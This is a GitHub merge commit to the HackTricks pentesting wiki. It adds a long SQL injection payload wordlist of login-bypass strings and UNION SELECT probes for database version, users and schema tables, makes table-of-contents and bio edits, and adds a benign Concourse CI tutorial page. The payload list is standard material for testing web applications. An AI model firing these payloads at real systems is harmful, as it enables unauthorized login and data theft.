Merge branch 'carlospolop:master' into responder-dhcp

This commit is contained in:
clem9669 2022-02-28 23:30:22 +01:00 committed by GitHub
commit a73f0ef086
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
68 changed files with 1411 additions and 245 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 72 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 44 KiB

After

Width:  |  Height:  |  Size: 32 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 93 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 13 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 766 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 766 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 740 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 137 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 137 KiB

View file

@ -0,0 +1,771 @@
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
'
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
or 1=1
or true
' or ''='
" or ""="
1) and '1='1
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
and 1=1
and 1=1
' and 'one'='one
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
or 0=0 --
or 0=0 #
or 0=0
' or 0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0
" or 0=0 --
" or 0=0 #
" or 0=0
%' or '0'='0
or 1=1
or 1=1--
or 1=1/*
or 1=1#
or 1=1
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1='1
' or 1=1
' or 1=1 --
' or 1=1
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1='1
) or ('1='1
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
==
=
'
"
'-- 2
'/*
'#
"-- 2
" #
"/*
'-'
'&'
'^'
'*'
'='
0'<'2
"-"
"&"
"^"
"*"
"="
0"<"2
')
")
')-- 2
')/*
')#
")-- 2
") #
")/*
')-('
')&('
')^('
')*('
')=('
0')<('2
")-("
")&("
")^("
")*("
")=("
0")<("2
'-''-- 2
'-''#
'-''/*
'&''-- 2
'&''#
'&''/*
'^''-- 2
'^''#
'^''/*
'*''-- 2
'*''#
'*''/*
'=''-- 2
'=''#
'=''/*
0'<'2'-- 2
0'<'2'#
0'<'2'/*
"-""-- 2
"-""#
"-""/*
"&""-- 2
"&""#
"&""/*
"^""-- 2
"^""#
"^""/*
"*""-- 2
"*""#
"*""/*
"=""-- 2
"=""#
"=""/*
0"<"2"-- 2
0"<"2"#
0"<"2"/*
')-''-- 2
')-''#
')-''/*
')&''-- 2
')&''#
')&''/*
')^''-- 2
')^''#
')^''/*
')*''-- 2
')*''#
')*''/*
')=''-- 2
')=''#
')=''/*
0')<'2'-- 2
0')<'2'#
0')<'2'/*
")-""-- 2
")-""#
")-""/*
")&""-- 2
")&""#
")&""/*
")^""-- 2
")^""#
")^""/*
")*""-- 2
")*""#
")*""/*
")=""-- 2
")=""#
")=""/*
0")<"2-- 2
0")<"2#
0")<"2/*
'oR'2
'oR'2'-- 2
'oR'2'#
'oR'2'/*
'oR'2'oR'
'oR(2)-- 2
'oR(2)#
'oR(2)/*
'oR(2)oR'
'oR 2-- 2
'oR 2#
'oR 2/*
'oR 2 oR'
'oR/**/2-- 2
'oR/**/2#
'oR/**/2/*
'oR/**/2/**/oR'
"oR"2
"oR"2"-- 2
"oR"2"#
"oR"2"/*
"oR"2"oR"
"oR(2)-- 2
"oR(2)#
"oR(2)/*
"oR(2)oR"
"oR 2-- 2
"oR 2#
"oR 2/*
"oR 2 oR"
"oR/**/2-- 2
"oR/**/2#
"oR/**/2/*
"oR/**/2/**/oR"
'oR'2'='2
'oR'2'='2'oR'
'oR'2'='2'-- 2
'oR'2'='2'#
'oR'2'='2'/*
'oR'2'='2'oR'
'oR 2=2-- 2
'oR 2=2#
'oR 2=2/*
'oR 2=2 oR'
'oR/**/2=2-- 2
'oR/**/2=2#
'oR/**/2=2/*
'oR/**/2=2/**/oR'
'oR(2)=2-- 2
'oR(2)=2#
'oR(2)=2/*
'oR(2)=2/*
'oR(2)=(2)oR'
'oR'2'='2' LimIT 1-- 2
'oR'2'='2' LimIT 1#
'oR'2'='2' LimIT 1/*
'oR(2)=(2)LimIT(1)-- 2
'oR(2)=(2)LimIT(1)#
'oR(2)=(2)LimIT(1)/*
"oR"2"="2
"oR"2"="2"oR"
"oR"2"="2"-- 2
"oR"2"="2"#
"oR"2"="2"/*
"oR"2"="2"oR"
"oR 2=2-- 2
"oR 2=2#
"oR 2=2/*
"oR 2=2 oR"
"oR/**/2=2-- 2
"oR/**/2=2#
"oR/**/2=2/*
"oR/**/2=2/**/oR"
"oR(2)=2-- 2
"oR(2)=2#
"oR(2)=2/*
"oR(2)=2/*
"oR(2)=(2)oR"
"oR"2"="2" LimIT 1-- 2
"oR"2"="2" LimIT 1#
"oR"2"="2" LimIT 1/*
"oR(2)=(2)LimIT(1)-- 2
"oR(2)=(2)LimIT(1)#
"oR(2)=(2)LimIT(1)/*
'oR true-- 2
'oR true#
'oR true/*
'oR true oR'
'oR(true)-- 2
'oR(true)#
'oR(true)/*
'oR(true)oR'
'oR/**/true-- 2
'oR/**/true#
'oR/**/true/*
'oR/**/true/**/oR'
"oR true-- 2
"oR true#
"oR true/*
"oR true oR"
"oR(true)-- 2
"oR(true)#
"oR(true)/*
"oR(true)oR"
"oR/**/true-- 2
"oR/**/true#
"oR/**/true/*
"oR/**/true/**/oR"
'oR'2'LiKE'2
'oR'2'LiKE'2'-- 2
'oR'2'LiKE'2'#
'oR'2'LiKE'2'/*
'oR'2'LiKE'2'oR'
'oR(2)LiKE(2)-- 2
'oR(2)LiKE(2)#
'oR(2)LiKE(2)/*
'oR(2)LiKE(2)oR'
"oR"2"LiKE"2
"oR"2"LiKE"2"-- 2
"oR"2"LiKE"2"#
"oR"2"LiKE"2"/*
"oR"2"LiKE"2"oR"
"oR(2)LiKE(2)-- 2
"oR(2)LiKE(2)#
"oR(2)LiKE(2)/*
"oR(2)LiKE(2)oR"
admin
admin'-- 2
admin'#
admin'/*
admin"-- 2
admin"#
ffifdyop
' UniON SElecT 1,2-- 2
' UniON SElecT 1,2,3-- 2
' UniON SElecT 1,2,3,4-- 2
' UniON SElecT 1,2,3,4,5-- 2
' UniON SElecT 1,2#
' UniON SElecT 1,2,3#
' UniON SElecT 1,2,3,4#
' UniON SElecT 1,2,3,4,5#
'UniON(SElecT(1),2)-- 2
'UniON(SElecT(1),2,3)-- 2
'UniON(SElecT(1),2,3,4)-- 2
'UniON(SElecT(1),2,3,4,5)-- 2
'UniON(SElecT(1),2)#
'UniON(SElecT(1),2,3)#
'UniON(SElecT(1),2,3,4)#
'UniON(SElecT(1),2,3,4,5)#
" UniON SElecT 1,2-- 2
" UniON SElecT 1,2,3-- 2
" UniON SElecT 1,2,3,4-- 2
" UniON SElecT 1,2,3,4,5-- 2
" UniON SElecT 1,2#
" UniON SElecT 1,2,3#
" UniON SElecT 1,2,3,4#
" UniON SElecT 1,2,3,4,5#
"UniON(SElecT(1),2)-- 2
"UniON(SElecT(1),2,3)-- 2
"UniON(SElecT(1),2,3,4)-- 2
"UniON(SElecT(1),2,3,4,5)-- 2
"UniON(SElecT(1),2)#
"UniON(SElecT(1),2,3)#
"UniON(SElecT(1),2,3,4)#
"UniON(SElecT(1),2,3,4,5)#
'||'2
'||2-- 2
'||'2'||'
'||2#
'||2/*
'||2||'
"||"2
"||2-- 2
"||"2"||"
"||2#
"||2/*
"||2||"
'||'2'='2
'||'2'='2'||'
'||2=2-- 2
'||2=2#
'||2=2/*
'||2=2||'
"||"2"="2
"||"2"="2"||"
"||2=2-- 2
"||2=2#
"||2=2/*
"||2=2||"
'||2=(2)LimIT(1)-- 2
'||2=(2)LimIT(1)#
'||2=(2)LimIT(1)/*
"||2=(2)LimIT(1)-- 2
"||2=(2)LimIT(1)#
"||2=(2)LimIT(1)/*
'||true-- 2
'||true#
'||true/*
'||true||'
"||true-- 2
"||true#
"||true/*
"||true||"
'||'2'LiKE'2
'||'2'LiKE'2'-- 2
'||'2'LiKE'2'#
'||'2'LiKE'2'/*
'||'2'LiKE'2'||'
'||(2)LiKE(2)-- 2
'||(2)LiKE(2)#
'||(2)LiKE(2)/*
'||(2)LiKE(2)||'
"||"2"LiKE"2
"||"2"LiKE"2"-- 2
"||"2"LiKE"2"#
"||"2"LiKE"2"/*
"||"2"LiKE"2"||"
"||(2)LiKE(2)-- 2
"||(2)LiKE(2)#
"||(2)LiKE(2)/*
"||(2)LiKE(2)||"
')oR('2
')oR'2'-- 2
')oR'2'#
')oR'2'/*
')oR'2'oR('
')oR(2)-- 2
')oR(2)#
')oR(2)/*
')oR(2)oR('
')oR 2-- 2
')oR 2#
')oR 2/*
')oR 2 oR('
')oR/**/2-- 2
')oR/**/2#
')oR/**/2/*
')oR/**/2/**/oR('
")oR("2
")oR"2"-- 2
")oR"2"#
")oR"2"/*
")oR"2"oR("
")oR(2)-- 2
")oR(2)#
")oR(2)/*
")oR(2)oR("
")oR 2-- 2
")oR 2#
")oR 2/*
")oR 2 oR("
")oR/**/2-- 2
")oR/**/2#
")oR/**/2/*
")oR/**/2/**/oR("
')oR'2'=('2
')oR'2'='2'oR('
')oR'2'='2'-- 2
')oR'2'='2'#
')oR'2'='2'/*
')oR'2'='2'oR('
')oR 2=2-- 2
')oR 2=2#
')oR 2=2/*
')oR 2=2 oR('
')oR/**/2=2-- 2
')oR/**/2=2#
')oR/**/2=2/*
')oR/**/2=2/**/oR('
')oR(2)=2-- 2
')oR(2)=2#
')oR(2)=2/*
')oR(2)=2/*
')oR(2)=(2)oR('
')oR'2'='2' LimIT 1-- 2
')oR'2'='2' LimIT 1#
')oR'2'='2' LimIT 1/*
')oR(2)=(2)LimIT(1)-- 2
')oR(2)=(2)LimIT(1)#
')oR(2)=(2)LimIT(1)/*
")oR"2"=("2
")oR"2"="2"oR("
")oR"2"="2"-- 2
")oR"2"="2"#
")oR"2"="2"/*
")oR"2"="2"oR("
")oR 2=2-- 2
")oR 2=2#
")oR 2=2/*
")oR 2=2 oR("
")oR/**/2=2-- 2
")oR/**/2=2#
")oR/**/2=2/*
")oR/**/2=2/**/oR("
")oR(2)=2-- 2
")oR(2)=2#
")oR(2)=2/*
")oR(2)=2/*
")oR(2)=(2)oR("
")oR"2"="2" LimIT 1-- 2
")oR"2"="2" LimIT 1#
")oR"2"="2" LimIT 1/*
")oR(2)=(2)LimIT(1)-- 2
")oR(2)=(2)LimIT(1)#
")oR(2)=(2)LimIT(1)/*
')oR true-- 2
')oR true#
')oR true/*
')oR true oR('
')oR(true)-- 2
')oR(true)#
')oR(true)/*
')oR(true)oR('
')oR/**/true-- 2
')oR/**/true#
')oR/**/true/*
')oR/**/true/**/oR('
")oR true-- 2
")oR true#
")oR true/*
")oR true oR("
")oR(true)-- 2
")oR(true)#
")oR(true)/*
")oR(true)oR("
")oR/**/true-- 2
")oR/**/true#
")oR/**/true/*
")oR/**/true/**/oR("
')oR'2'LiKE('2
')oR'2'LiKE'2'-- 2
')oR'2'LiKE'2'#
')oR'2'LiKE'2'/*
')oR'2'LiKE'2'oR('
')oR(2)LiKE(2)-- 2
')oR(2)LiKE(2)#
')oR(2)LiKE(2)/*
')oR(2)LiKE(2)oR('
")oR"2"LiKE("2
")oR"2"LiKE"2"-- 2
")oR"2"LiKE"2"#
")oR"2"LiKE"2"/*
")oR"2"LiKE"2"oR("
")oR(2)LiKE(2)-- 2
")oR(2)LiKE(2)#
")oR(2)LiKE(2)/*
")oR(2)LiKE(2)oR("
admin')-- 2
admin')#
admin')/*
admin")-- 2
admin")#
') UniON SElecT 1,2-- 2
') UniON SElecT 1,2,3-- 2
') UniON SElecT 1,2,3,4-- 2
') UniON SElecT 1,2,3,4,5-- 2
') UniON SElecT 1,2#
') UniON SElecT 1,2,3#
') UniON SElecT 1,2,3,4#
') UniON SElecT 1,2,3,4,5#
')UniON(SElecT(1),2)-- 2
')UniON(SElecT(1),2,3)-- 2
')UniON(SElecT(1),2,3,4)-- 2
')UniON(SElecT(1),2,3,4,5)-- 2
')UniON(SElecT(1),2)#
')UniON(SElecT(1),2,3)#
')UniON(SElecT(1),2,3,4)#
')UniON(SElecT(1),2,3,4,5)#
") UniON SElecT 1,2-- 2
") UniON SElecT 1,2,3-- 2
") UniON SElecT 1,2,3,4-- 2
") UniON SElecT 1,2,3,4,5-- 2
") UniON SElecT 1,2#
") UniON SElecT 1,2,3#
") UniON SElecT 1,2,3,4#
") UniON SElecT 1,2,3,4,5#
")UniON(SElecT(1),2)-- 2
")UniON(SElecT(1),2,3)-- 2
")UniON(SElecT(1),2,3,4)-- 2
")UniON(SElecT(1),2,3,4,5)-- 2
")UniON(SElecT(1),2)#
")UniON(SElecT(1),2,3)#
")UniON(SElecT(1),2,3,4)#
")UniON(SElecT(1),2,3,4,5)#
')||('2
')||2-- 2
')||'2'||('
')||2#
')||2/*
')||2||('
")||("2
")||2-- 2
")||"2"||("
")||2#
")||2/*
")||2||("
')||'2'=('2
')||'2'='2'||('
')||2=2-- 2
')||2=2#
')||2=2/*
')||2=2||('
")||"2"=("2
")||"2"="2"||("
")||2=2-- 2
")||2=2#
")||2=2/*
")||2=2||("
')||2=(2)LimIT(1)-- 2
')||2=(2)LimIT(1)#
')||2=(2)LimIT(1)/*
")||2=(2)LimIT(1)-- 2
")||2=(2)LimIT(1)#
")||2=(2)LimIT(1)/*
')||true-- 2
')||true#
')||true/*
')||true||('
")||true-- 2
")||true#
")||true/*
")||true||("
')||'2'LiKE('2
')||'2'LiKE'2'-- 2
')||'2'LiKE'2'#
')||'2'LiKE'2'/*
')||'2'LiKE'2'||('
')||(2)LiKE(2)-- 2
')||(2)LiKE(2)#
')||(2)LiKE(2)/*
')||(2)LiKE(2)||('
")||"2"LiKE("2
")||"2"LiKE"2"-- 2
")||"2"LiKE"2"#
")||"2"LiKE"2"/*
")||"2"LiKE"2"||("
")||(2)LiKE(2)-- 2
")||(2)LiKE(2)#
")||(2)LiKE(2)/*
")||(2)LiKE(2)||("
' UnION SELeCT 1,2`
' UnION SELeCT 1,2,3`
' UnION SELeCT 1,2,3,4`
' UnION SELeCT 1,2,3,4,5`
" UnION SELeCT 1,2`
" UnION SELeCT 1,2,3`
" UnION SELeCT 1,2,3,4`
" UnION SELeCT 1,2,3,4,5`

View file

@ -2,7 +2,7 @@
And more services: And more services:
ubiquiti-discover udp "Ubiquiti Networks Device" ubiquiti-discover udp "Ubiquiti Networks Device"&#x20;
dht udp "DHT Nodes" dht udp "DHT Nodes"
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>) ![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
InfluxDB InfluxDB

View file

@ -190,13 +190,13 @@
* [Pentesting Network](pentesting/pentesting-network/README.md) * [Pentesting Network](pentesting/pentesting-network/README.md)
* [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) * [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
* [Spoofing SSDP and UPnP Devices with EvilSSDP](pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md) * [Spoofing SSDP and UPnP Devices with EvilSSDP](pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)
* [Wifi Attacks](pentesting/pentesting-network/wifi-attacks/README.md)
* [Evil Twin EAP-TLS](pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md)
* [Pentesting IPv6](pentesting/pentesting-network/pentesting-ipv6.md) * [Pentesting IPv6](pentesting/pentesting-network/pentesting-ipv6.md)
* [Nmap Summary (ESP)](pentesting/pentesting-network/nmap-summary-esp.md) * [Nmap Summary (ESP)](pentesting/pentesting-network/nmap-summary-esp.md)
* [Network Protocols Explained (ESP)](pentesting/pentesting-network/network-protocols-explained-esp.md) * [Network Protocols Explained (ESP)](pentesting/pentesting-network/network-protocols-explained-esp.md)
* [IDS and IPS Evasion](pentesting/pentesting-network/ids-evasion.md) * [IDS and IPS Evasion](pentesting/pentesting-network/ids-evasion.md)
* [DHCPv6](pentesting/pentesting-network/dhcpv6.md) * [DHCPv6](pentesting/pentesting-network/dhcpv6.md)
* [Pentesting Wifi](pentesting/pentesting-wifi/README.md)
* [Evil Twin EAP-TLS](pentesting/pentesting-wifi/evil-twin-eap-tls.md)
* [Pentesting JDWP - Java Debug Wire Protocol](pentesting/pentesting-jdwp-java-debug-wire-protocol.md) * [Pentesting JDWP - Java Debug Wire Protocol](pentesting/pentesting-jdwp-java-debug-wire-protocol.md)
* [Pentesting Printers](pentesting/pentesting-printers/README.md) * [Pentesting Printers](pentesting/pentesting-printers/README.md)
* [Accounting bypass](pentesting/pentesting-printers/accounting-bypass.md) * [Accounting bypass](pentesting/pentesting-printers/accounting-bypass.md)
@ -530,6 +530,7 @@
* [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md) * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
* [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md) * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
* [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md) * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
* [Concourse](cloud-security/concourse.md)
* [Cloud Security Review](cloud-security/cloud-security-review.md) * [Cloud Security Review](cloud-security/cloud-security-review.md)
* [AWS Security](cloud-security/aws-security.md) * [AWS Security](cloud-security/aws-security.md)
@ -629,6 +630,9 @@
*** ***
* [Radio Hacking](radio-hacking/README.md)
* [Pentesting RFID](radio-hacking/pentesting-rfid.md)
* [Pentesting BLE - Bluetooth Low Energy](radio-hacking/pentesting-ble-bluetooth-low-energy.md)
* [Burp Suite](burp-suite.md) * [Burp Suite](burp-suite.md)
* [Other Web Tricks](other-web-tricks.md) * [Other Web Tricks](other-web-tricks.md)
* [Interesting HTTP](interesting-http.md) * [Interesting HTTP](interesting-http.md)

View file

@ -10,15 +10,13 @@ I also wants to say **thanks to all the people that share cyber-security related
### BIO ### BIO
If for some weird reason you are interested in knowing about my bio here you have a summary: * I've worked in different companies as sysadmin, developer and **pentester**
* I've worked in different companies as sysadmin, developer and **pentester**.
* I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity** * I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity**
* Relevant certifications: **OSCP, OSWE**, **CRTP, eMAPT, eWPTXv2** and Professional Drone pilot. * Relevant certifications: **OSCP, OSWE**, **CRTP, eMAPT, eWPTXv2** and Professional Drone pilot
* I speak **Spanish** and **English** and little of French (some day I will improve that). * I speak **Spanish** and **English** and little of French (some day I will improve that)
* I'm a **CTF player** * I'm a **CTF player**
* I'm very proud of this **book** and my **PEASS** (I'm talking about these peass: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)) * I'm very proud of this **book** and my **PEASS** (I'm talking about these peass: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite))
* And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**. * And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**
### Support HackTricks ### Support HackTricks

201
cloud-security/concourse.md Normal file
View file

@ -0,0 +1,201 @@
# Concourse
## Introduction
Concourse is a pipeline-based continuous thing-doer.
### Installation for testing
This docker-compose file simplifies the installation to do some tests with concourse:
```bash
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
```
You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
### Create Pipeline
A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
### Steps
Several different type of steps can be used:
* the [`task` step](https://concourse-ci.org/task-step.html) runs a [task](https://concourse-ci.org/tasks.html)
* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
Therefore, it's possible to indicate the type of container each step needs to be run in.
### Simple Pipeline Example
```yaml
jobs:
- name: hello-world-job
plan:
- task: hello-world-task
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
# The command Concourse will run inside the container
# echo "Hello world!"
run:
path: echo
args: ["Hello world!"]
```
```bash
fly -t tutorial set-pipeline -p hello-world -c hello-world.yml
# pipelines are paused when first created
fly -t tutorial unpause-pipeline -p hello-world
# trigger the job and watch it run to completion
fly -t tutorial trigger-job --job hello-world/hello-world-job --watch
```
### Bash script with output/input pipeline
```yaml
jobs:
- name: hello-world-job
plan:
- task: hello-world-task
config:
platform: linux
image_resource:
type: registry-image
source:
repository: busybox
outputs:
- name: the-artifact
run:
# This is a neat way of embedding a script into a task
path: sh
args:
- -cx
- |
ls -l .
echo "hello from another step!" > the-artifact/message
# Add a second task that reads the contents of the-artifact/message
- task: read-the-artifact
config:
platform: linux
image_resource:
type: registry-image
source:
repository: busybox
# To recieve "the-artifact", specify it as an input
inputs:
- name: the-artifact
run:
path: sh
args:
- -cx
- |
ls -l .
cat the-artifact/message
```
### Triggers
You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
* Some time passes: [Time resource](https://github.com/concourse/time-resource/)
* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
## User Roles & Permissions
Concourse comes with five roles:
* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
* **owner**: Team owners can **modify everything within the team**.
* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
{% hint style="info" %}
Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
{% endhint %}
## Vars & Credential Manager
In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\
The **source-name is optional**, and if omitted, he [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The **optional **_**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
### Static Vars
Static vars can be specified in **tasks steps**:
```yaml
- task: unit-1.13
file: booklit/ci/unit.yml
vars: {tag: 1.13}
```
Or using the following `fly` **arguments**:
* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
### Credential Management
There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports different credential managers:
* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
